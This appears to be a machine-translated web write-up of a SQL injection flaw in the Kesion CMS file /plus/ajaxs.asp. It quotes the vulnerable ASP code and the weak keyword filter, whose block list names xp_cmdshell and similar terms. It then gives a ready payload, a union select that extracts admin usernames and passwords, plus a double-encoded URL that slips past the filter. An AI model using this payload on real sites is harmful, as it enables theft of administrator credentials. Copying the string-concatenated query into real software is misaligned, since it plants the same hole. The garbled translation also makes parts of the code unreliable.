Let's look at the code first.
The code is as follows |
Copy Code |
Dim Ks:set ks=new Publiccls Dim Action Action=ks. S ("Action") Select Case Action Case "Ctoe" Ctoe Case "GetTags" gettags Case "Getrelativeitem" getrelativeitem//Problem function ... skip ... Case "Getonlinelist" getonlinelist End Select Sub Getrelativeitem ()//Vulnerability function start Dim Key:key=unescape (KS. S ("Key"))//vulnerability location, only call KS.S function, no other filtering. Dim rtitle:rtitle=lcase (KS. G ("Rtitle")) Dim rkey:rkey=lcase (KS. G ("Rkey")) Dim Channelid:channelid=ks. CHKCLNG (KS. S ("Channelid")) Dim Id:id=ks. CHKCLNG (KS. G ("ID")) Dim Param,rs,sql,k,sqlstr If key<> "" Then If (rtitle= "true" Or rkey= "true") Then If rtitle= "true" Then Param=param & "title like '%" & key & "%"//similar to search-type injection vulnerabilities. End If If rkey= "true" Then If param= "" Then Param=param & "keywords like '%" & key & "%" Else Param=param & "or keywords like '%" & key & "%" End If End If Else Param=param & "keywords like '%" & key & "%" End If End If If param<> "" Then Param= "where infoid<>" & ID & "and" ("& Param &") " Else Param= "where infoid<>" & ID End If If channelid<>0 Then Param=param & "and channelid=" & Channelid Param=param & "and Verific=1" Sqlstr= ' select top channelid,infoid,title from Ks_iteminfo ' & Param & ' ORDER BY id DESC '//Query Set rs=server.createobject ("ADODB. RECORDSET ") Rs. Open sqlstr,conn,1,1 If not RS. Eof Then Sql=rs. GetRows (-1) End If Rs. Close |
If the unescape () function is combined, just filtering will not take effect. You can use Unicode encoding, and the filtered characters will not appear in the browser. For example, single quotes can be encoded as. %2527, after decoding or "'", in this way, you can use PHP-like two times coding vulnerabilities to bypass filtering.
Injection statement:% ') union select 1,2,username+ ' | ' + Password from Ks_admin
The conversion is as follows:
The code is as follows |
Copy Code |
/plus/ajaxs.asp?action=getrelativeitem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573% 2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527% 252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569% 256e%2500 |
Filter first, then call Unescape decoding,
The code is as follows |
Copy Code |
Public Function S (STR) S = Delsql (replace (Request (STR), "'", ""), "" "," ")) Function Delsql (STR) Dim Splitsqlstr,splitsqlarr,i Splitsqlstr= "Dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid| Chr|set |where|xp_cmdshell " Splitsqlarr = Split (splitsqlstr, "|") For I=lbound (Splitsqlarr) to Ubound (Splitsqlarr) If Instr (LCase (STR), Splitsqlarr (I)) >0 Then Die "<script>alert (' System warning! NN1, the data you submitted has malicious characters "& Splitsqlarr (I) &"; N2, your data has been recorded; N3, your IP: "&GetIP&" N4, date of operation: "&Now&"; n Powered by kesion.com! '); Window.close ();</script> " End If Next Delsql = Str End Function |
So we're still starting with that sentence. Use the unescape () function or do not use this function.